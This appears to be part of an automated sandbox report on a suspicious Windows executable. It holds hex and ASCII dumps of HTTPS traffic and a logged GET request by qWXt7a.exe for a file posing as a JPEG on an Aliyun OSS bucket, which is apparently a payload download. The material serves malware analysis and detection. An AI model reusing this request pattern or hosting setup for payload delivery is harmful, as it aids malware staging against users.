2025-01-01 07:31:18 UTC	3549	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-01 07:31:18 UTC	4096	IN	Data Raw: cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 9c Data Ascii: ;K5Aat=BGjD=\|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@\|-$XW9!][b-I^pHcf
2025-01-01 07:31:18 UTC	4096	IN	Data Raw: c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 f3 Data Ascii: xd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
2025-01-01 07:31:18 UTC	4096	IN	Data Raw: e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c a4 Data Ascii: ^h0X<LU)dF]:ywSDJu7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD\|T#c-Cpk^0ncLhz43h\`/k?_wE\
2025-01-01 07:31:18 UTC	4096	IN	Data Raw: 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 d5 Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;\|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
2025-01-01 07:31:18 UTC	4096	IN	Data Raw: 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 28 Data Ascii: M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ\|fan?adq~\|(
2025-01-01 07:31:18 UTC	4096	IN	Data Raw: 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 ab Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
2025-01-01 07:31:18 UTC	4096	IN	Data Raw: 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca 6b Data Ascii: 07,7OL\|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/k
2025-01-01 07:31:18 UTC	4096	IN	Data Raw: 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 44 Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*D
2025-01-01 07:31:18 UTC	4096	IN	Data Raw: d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a e8 Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]\|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49987	118.178.60.9	443	8184	C:\Users\user\Documents\qWXt7a.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:31:29 UTC	115	OUT	GET /FOM-52.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:31:29 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:31:29 GMT Content-Type: image/jpeg Content-Length: 5062442 Connection: close x-oss-request-id: 6774EF5153726E3535C16B8E Accept-Ranges: bytes ETag: "70C21DA900796B279A09040B00953E40" Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 360383310743409046 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: cMIdqQB5ayeaCQQLAJU+QA== x-oss-server-time: 2
2025-01-01 07:31:29 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-01 07:31:29 UTC	4096	IN	Data Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|o
2025-01-01 07:31:29 UTC	4096	IN	Data Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11 Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-01 07:31:29 UTC	4096	IN	Data Raw: f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus\|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
2025-01-01 07:31:29 UTC	4096	IN	Data Raw: 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d f2 Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,\|Zk!4ROn2 HPijFS~DcC69Kv m
2025-01-01 07:31:29 UTC	4096	IN	Data Raw: f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c ab Data Ascii: NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
2025-01-01 07:31:29 UTC	4096	IN	Data Raw: fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71 25 Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq%
2025-01-01 07:31:29 UTC	4096	IN	Data Raw: ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59 3a Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<\|=UyO}YzX<~+#~j8cZ2[.K0`++@)GZrg"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY:
2025-01-01 07:31:29 UTC	4096	IN	Data Raw: cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3 4d Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:M
